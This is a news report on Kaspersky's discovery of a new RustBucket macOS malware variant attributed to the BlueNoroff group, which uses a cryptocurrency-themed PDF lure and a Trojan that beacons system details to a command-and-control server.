In a recent discovery by cybersecurity experts at Kaspersky Lab, a sophisticated variant of a malicious downloader has been identified, marking the resurgence of the notorious BlueNoroff APT group. This new campaign, aptly named RustBucket, specifically targets macOS users, focusing its attacks on financial institutions, companies associated with cryptocurrency, and even private individuals involved in the crypto space.
The modus operandi of RustBucket has evolved since its earlier iterations, which distributed malicious payloads through applications masquerading as innocent PDF viewers. The latest version, however, was concealed within a ZIP archive housing a PDF file titled “Cryptocurrency assets and their risks to financial stability.” The file, adorned with a seemingly innocuous cover page, carries a creation date of October 21, 2023.
The distribution method of this malicious archive remains shrouded in mystery, though past campaigns suggest cybercriminals may employ email as a primary delivery channel. Users are often tricked into opening seemingly legitimate files, unwittingly unleashing the malware onto their systems.
One notable aspect of RustBucket’s evolution is the use of a seemingly legitimate application called EdoneViewer, written in the Swift programming language. The executable, presented in a universal format compatible with both Intel and Apple Silicon chips, initially carried a valid signature. However, the attackers’ certificate was subsequently revoked after its discovery, underlining the ever-evolving nature of cyber threats.
The malicious payload, encoded using XOR encryption, undergoes decoding orchestrated by the CalculateExtameGCD function, culminating in an AppleScript format. This script, when executed, initiates a sequence of shell commands. These commands include distraction tactics like downloading a decoy PDF file and, more critically, sending a request to a server with the response stored in a concealed file named “pw.”
The universal .pw file, identified as a Trojan previously in August, plays a pivotal role in the RustBucket campaign. It systematically collects and transmits vital system information, including the computer name, operating system details, time zone, and a list of currently running processes. This information is transmitted to the command and control (C2) server, on-global[.]xyz.
The Trojan operates cyclically, sending data to the C2 server every minute, awaiting commands that could potentially unleash the next stage of the attack. Intriguingly, researchers, during their analysis, did not receive any commands from the server, leaving the contents of the subsequent attack stage shrouded in uncertainty.
While the lack of received commands during analysis might have hindered a full understanding of RustBucket’s capabilities, the silver lining lies in the fact that the Trojan is now widely detected by most antivirus solutions. This discovery highlights the constant cat-and-mouse game between cyber defenders and threat actors, urging users to remain vigilant and keep their security software up to date in the ever-evolving landscape of cybersecurity threats.